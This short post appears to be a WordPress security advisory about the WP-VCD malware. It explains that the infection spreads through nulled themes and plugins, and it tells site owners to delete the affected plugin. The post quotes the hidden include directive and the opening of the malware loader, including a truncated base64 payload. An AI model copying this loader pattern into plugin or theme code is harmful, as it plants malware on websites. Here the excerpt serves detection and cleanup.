Another attack on wordpress 4.8
Visit : Medium ,
Check out the guidelines and Remove above mentioned files to make your wordpress safe.
Let me know, If you find anything suspicious in your wordpress.
If you think, your wordpress is now secure, Please click on Clap button on Medium.
Update 1 :
How it spreads?
The first thing to understand how to defeat an enemy is to understand it. The cause of WP-VCD attack is a nulled theme or a nulled plugin. Inside the plugin installation file many times is present this directive:
<?php if (file_exists(dirname(__FILE__) . '/class.plugin-modules.php')) include_once(dirname(__FILE__) . '/class.plugin-modules.php'); ?> <?php /* Plugin Name: Example Plugin URI: http://example.com/ Author: John Doe .... */
That directive load a script that will spread the malware. Opening that file is possible to found the malware code:
<?php //install_code1 error_reporting(0); ini_set('display_errors', 0); DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']); $GLOBALS['WP_CD_CODE'] = 'PDHstAgXchan5E3JlcG9ydG...
So the first step to do in order to defeat the malware is to delete the involved plugin (or at least remove malware code from the plugin).
Contributor(s) : (Special Thanks To...)
EDIT #1 : (01/08/2018)